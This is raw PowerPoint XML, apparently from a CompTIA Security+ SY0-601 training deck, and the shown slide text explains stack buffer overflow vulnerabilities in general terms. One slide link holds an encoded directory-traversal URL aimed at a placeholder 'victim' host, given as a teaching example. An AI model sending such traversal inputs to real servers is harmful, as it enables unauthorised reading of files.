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Default Extension="jpg" ContentType="image/jpg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  <p:sldId id="461" r:id="rId211"/>
    <p:sldId id="462" r:id="rId212"/>
    <p:sldId id="463" r:id="rId213"/>
    <p:sldId id="464" r:id="rId214"/>
    <p:sldId id="465" r:id="rId215"/>
    <p:sldId id="466" r:id="rId216"/>
    <p:sldId id="467" r:id="rId217"/>
    <p:sldId id="468" r:id="rId218"/>
    <p:sldId id="469" r:id="rId219"/>
    <p:sldId id="470" r:id="rId220"/>
    <p:sldId id="471" r:id="rId221"/>
    <p:sldId id="472" r:id="rId222"/>
    <p:sldId id="473" r:id="rId223"/>
    <p:sldId id="474" r:id="rId224"/>
    <p:sldId id="475" r:id="rId225"/>
    <p:sldId id="476" r:id="rId226"/>
    <p:sldId id="477" r:id="rId227"/>
    <p:sldId id="478" r:id="rId228"/>
    <p:sldId id="479" r:id="rId229"/>
    <p:sldId id="480" r:id="rId230"/>
    <p:sldId id="481" r:id="rId231"/>
    <p:sldId id="482" r:id="rId232"/>
    <p:sldId id="483" r:id="rId233"/>
    <p:sldId id="484" r:id="rId234"/>
    <p:sldId id="485" r:id="rId235"/>
    <p:sldId id="486" r:id="rId236"/>
    <p:sldId id="487" r:id="rId237"/>
    <p:sldId id="488" r:id="rId238"/>
    <p:sldId id="489" r:id="rId239"/>
    <p:sldId id="490" r:id="rId240"/>
    <p:sldId id="491" r:id="rId241"/>
    <p:sldId id="492" r:id="rId242"/>
    <p:sldId id="493" r:id="rId243"/>
  </p:sldIdLst>
  <p:sldSz cx="16256000" cy="9144000"/>
  <p:notesSz cx="16256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Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide158.xml"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide159.xml"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide160.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide161.xml"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide162.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide163.xml"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide164.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide165.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide166.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide167.xml"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide168.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide169.xml"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide170.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide171.xml"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide172.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide173.xml"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide174.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide175.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide176.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide177.xml"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide178.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide179.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide180.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide181.xml"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide182.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide183.xml"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide184.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide185.xml"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide186.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide187.xml"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide188.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide189.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide190.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide191.xml"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide192.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide193.xml"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide194.xml"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide195.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide196.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide197.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide198.xml"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide199.xml"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide200.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide201.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide202.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide203.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide204.xml"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide205.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide206.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide207.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide208.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide209.xml"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide210.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide211.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide212.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide213.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide214.xml"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide215.xml"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide216.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide217.xml"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide218.xml"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide219.xml"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide220.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide221.xml"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide222.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide223.xml"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide224.xml"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide225.xml"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide226.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide227.xml"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide228.xml"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide229.xml"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide230.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide231.xml"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide232.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide233.xml"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide234.xml"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide235.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide236.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide237.xml"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide238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19676" y="2834640"/>
            <a:ext cx="13822998" cy="1920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439352" y="5120640"/>
            <a:ext cx="11383645" cy="22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3E3E3E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813117" y="2103120"/>
            <a:ext cx="7074122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8375110" y="2103120"/>
            <a:ext cx="7074122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888" y="231647"/>
            <a:ext cx="3236976" cy="9144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84376" y="4258436"/>
            <a:ext cx="13293597" cy="835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99413" y="1882652"/>
            <a:ext cx="13415010" cy="33921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3E3E3E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5529199" y="8503920"/>
            <a:ext cx="5203952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813117" y="8503920"/>
            <a:ext cx="374034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1708892" y="8503920"/>
            <a:ext cx="374034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
</file>

<file path=ppt/slides/_rels/slide10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19.jp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jpg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide10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26.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image127.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.jpg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image120.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide10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0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28.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide10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0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0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0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0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
</file>

<file path=ppt/slides/_rels/slide1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/Relationships>

</file>

<file path=ppt/slides/_rels/slide1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18.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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32.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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15.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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33.jpg"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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34.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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/Relationships>

</file>

<file path=ppt/slides/_rels/slide1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/Relationships>

</file>

<file path=ppt/slides/_rels/slide1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1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1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1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
</file>

<file path=ppt/slides/_rels/slide1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
</file>

<file path=ppt/slides/_rels/slide1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1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/Relationships>

</file>

<file path=ppt/slides/_rels/slide1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39.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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40.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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41.jpg"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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/Relationships>

</file>

<file path=ppt/slides/_rels/slide1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/Relationships>

</file>

<file path=ppt/slides/_rels/slide1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4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7.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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47.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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48.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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49.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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50.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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51.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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52.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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5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54.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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/Relationships>

</file>

<file path=ppt/slides/_rels/slide1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57.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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58.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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59.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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1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
</file>

<file path=ppt/slides/_rels/slide1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
</file>

<file path=ppt/slides/_rels/slide1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1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60.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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18.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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61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Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image165.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image166.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image167.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16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8.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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71.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image172.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image173.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image174.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image175.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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7.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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8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
</file>

<file path=ppt/slides/_rels/slide1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82.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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83.jpg"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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84.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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85.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide1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
</file>

<file path=ppt/slides/_rels/slide1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86.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide19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20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87.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image188.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide20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20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20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18.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide20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20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89.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image190.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image191.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image192.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image193.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide20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20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94.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide20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4.jpg"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide2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95.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide2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2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2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
</file>

<file path=ppt/slides/_rels/slide2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
</file>

<file path=ppt/slides/_rels/slide2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2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2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96.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide2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97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2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2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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image201.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide2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2.jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide2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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image204.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide2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2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05.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image206.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide2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2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2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07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5.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide2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2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08.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image209.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image210.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image211.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide2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12.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide2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image" Target="../media/image215.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image216.jpg"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide2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2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2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2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17.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide2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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27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15.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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3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43.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44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45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hyperlink" Target="http://victim.foo/?show=%2e%2e%2f%2e%2e%2f%2e%25" TargetMode="External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52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53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54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8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12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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61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62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62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63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66.jp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67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67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68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1.pn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74.pn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3.pn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9.pn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90.png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2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95.png"/></Relationships>
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/Relationships>
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/Relationships>
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2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7.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image109.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
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
</file>

<file path=ppt/slides/_rels/slide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
</file>

<file path=ppt/slides/_rels/slide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12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/Relationships>

</file>

<file path=ppt/slides/_rels/slide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jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide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17.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide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18.png"/></Relationships>

</file>

<file path=ppt/slides/_rels/slide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9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0960" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="8333740" marR="5080" indent="-2419350">
              <a:lnSpc>
                <a:spcPts val="3020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CompTIA</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Security+</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Certification</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SYO-601 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-760">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Exam</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Training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1379" y="306451"/>
            <a:ext cx="43338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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-9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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vulnerabilities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46547" y="760476"/>
            <a:ext cx="5940552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65147" y="1882292"/>
            <a:ext cx="12118975" cy="11823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200" spc="25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>When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executed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normally,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function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will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return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control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3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calling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function.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If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code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vulnerable,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attacker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pass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malicious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3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function,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overflow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stack,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run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bitra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cod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gain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el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he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get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sy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m.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58542" y="5413705"/>
            <a:ext cx="143256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50" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Arguments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922773" y="3933697"/>
          <a:ext cx="2301240" cy="47212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3140"/>
              </a:tblGrid>
              <a:tr h="646938">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" marR="53975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dirty="0" sz="1600" spc="-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Sub()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178435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4668D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="19408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L="539115">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1750"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr dirty="0" sz="1600" spc="-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Sub()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1600" spc="-5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Stack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4668D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="539496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="337820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dirty="0" sz="1600" spc="5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Return</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1600" spc="-4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Address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135255"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4668D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="611123">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="872490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dirty="0" sz="1600" spc="6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Main()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17145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75C4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="9570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471170">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr dirty="0" sz="1600" spc="6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Main()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr dirty="0" sz="1600" spc="-7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Stack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445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75C4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4912867" y="3542538"/>
            <a:ext cx="230505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110" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Normal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-100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000" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Execution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18660" y="4252848"/>
            <a:ext cx="949325" cy="3005455"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="949325" h="3005454">
                <a:moveTo>
                  <a:pt x="883333" y="17311"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="810260" y="57912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="767841" y="83565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726313" y="110362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="685673" y="138175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="646049" y="167131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607313" y="196976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="569594" y="227837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="532891" y="259841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="497204" y="292608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462534" y="326516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429005" y="361188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="396493" y="396875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365125" y="433577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334772" y="471170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280162" y="545211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230377" y="621156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185800" y="698880"/>
